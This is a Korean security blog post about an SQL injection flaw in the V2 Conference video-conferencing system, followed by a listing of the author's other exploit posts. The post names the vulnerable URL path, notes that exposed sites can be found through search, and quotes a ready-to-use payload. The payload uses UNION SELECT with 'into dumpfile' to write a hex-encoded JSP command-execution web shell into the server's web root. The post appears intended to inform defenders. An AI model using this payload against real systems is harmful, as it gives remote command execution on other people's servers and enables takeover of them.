V2 Conference Video Conference System SQL injection Vulnerability.
2016.07.23 23:08
V2 Conference는 중국에서 만들어진 영상회의 시스템이다.
5월 정도에 sqlinjection 관련 취약점 글이 올라 왔고, 취약점을 이용한 공격이 종종 발생되는 것으로 보인다.
/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId 포함한 다수 URL에서 SQL injectin이 가능한 것으로 확인된다.
구글로 해당 URL을 검색하면, 다수의 사이트에서 V2 Conference를 사용함을 확인 할 수 있다.
SQL injectin 공격으로 v2 conference 관리자 계정정보를 획득 할 수 있다.
https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/V2_Conference/V2_Conference_GetShell.py
위의 URL에서 POC코드를 확인 할수 있다. POC에서는 POST Method를 이용하여 대상 서버에 웹쉘을 생성할 수 있다.
exp = """/Conf/jsp/systembulletin/bulletinAction.do?operator=modify&sysId=1 UNION SELECT 1,2,3,4,0x497420776F726B7321DA3C2540207061676520636F6E74656E74547970 653D22746578742F68746D6C3B20636861727365743D47424B2220253EDA3C254020 7061676520696D706F72743D226A6176612E696F2E2A2220253E203C252053747269 6E6720636D64203D20726571756573742E676574506172616D657465722822636D64 22293B20537472696E67206F7574707574203D2022223B20696628636D6420213D20 6E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F 636573732070203D2052756E74696D652E67657452756E74696D6528292E65786563 28636D64293B204275666665726564526561646572207349203D206E657720427566 6665726564526561646572286E657720496E70757453747265616D52656164657228 702E676574496E70757453747265616D282929293B207768696C65282873203D2073 492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D 2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E20 6529207B20652E7072696E74537461636B547261636528293B207D207DDA6F75742E 7072696E746C6E286F7574707574293B253EDA into dumpfile '../../management/webapps/root/V2ConferenceCmd.jsp'%23"""
UNION SELECT를 사용하여 hex값으로 웹쉘을 만들고 이것을 dumpfile명령어를 사용하여 특정 폴더에 생성하는 것을 확인 가능하다.
댓글 0
번호 | 제목 | 글쓴이 | 날짜 | 조회 수 |
---|---|---|---|---|
13 |
Apache struts2 RCE(Remote code execution) CVE-2017-5638, S2-045 취약점
![]() | Leekyu | 2017.03.19 | 2462 |
12 |
WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection 취약점
![]() | Leekyu | 2017.02.11 | 12553 |
11 |
Pydio / AjaXplorer 5.0.3 Shell Upload 파일 업로드 취약점
![]() | Leekyu | 2016.08.27 | 1051 |
» |
V2 Conference Video Conference System SQL injection Vulnerability.
![]() | Leekyu | 2016.07.23 | 958 |
9 | Joomla JCE Remote File Upload file (upgrade version) | Leekyu | 2016.04.04 | 6559 |
8 | Exploit Code for ipTIME firmwares < 9.58 RCE with root privileges against 127 router models [1] | Leekyu | 2016.02.18 | 3641 |
7 |
Remote File Inclusion
![]() | Leekyu | 2014.11.09 | 3420 |
6 | JBoss AS Remote Exploit [1] | Leekyu | 2014.09.23 | 2422 |
5 |
구글봇을 이용한 공격
![]() | Leekyu | 2014.04.20 | 7172 |
4 |
Tomcat web application manager exploit
![]() | Leekyu | 2013.10.13 | 5038 |
3 |
Joomla JCE Remote File Upload
![]() | Leekyu | 2013.09.29 | 14736 |
2 |
HTTP server CONNECT method used to bypass filtering (HTTP_Connect_Proxy_Bypass_SMTP)
![]() | Leekyu | 2013.09.25 | 19177 |
1 |
Dadong's JSXX 0.41 VIP 난독화
![]() | Leekyu | 2013.07.03 | 998 |